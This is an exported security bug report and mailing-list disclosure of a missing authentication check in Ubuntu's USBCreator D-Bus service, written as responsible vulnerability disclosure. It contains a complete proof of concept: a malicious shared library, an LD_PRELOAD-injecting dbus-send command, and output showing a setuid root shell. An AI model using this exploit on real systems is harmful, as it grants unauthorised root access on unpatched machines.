ioasis / google-security-research

Automatically exported from code.google.com/p/google-security-research
2 stars 0 forks source link

Linux: missing authentication check in usb-creator leads to local privilege escalation #413

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
[Also: http://www.ubuntu.com/usn/usn-2576-1/]

Date: Wed, 22 Apr 2015 16:50:08 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: USBCreator D-Bus service

Hello,

[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]

On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.

It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.

This seems like an obvious mistake, and the following appears to work
on my machine:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Thanks, Tavis.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by cev...@google.com on 28 May 2015 at 10:14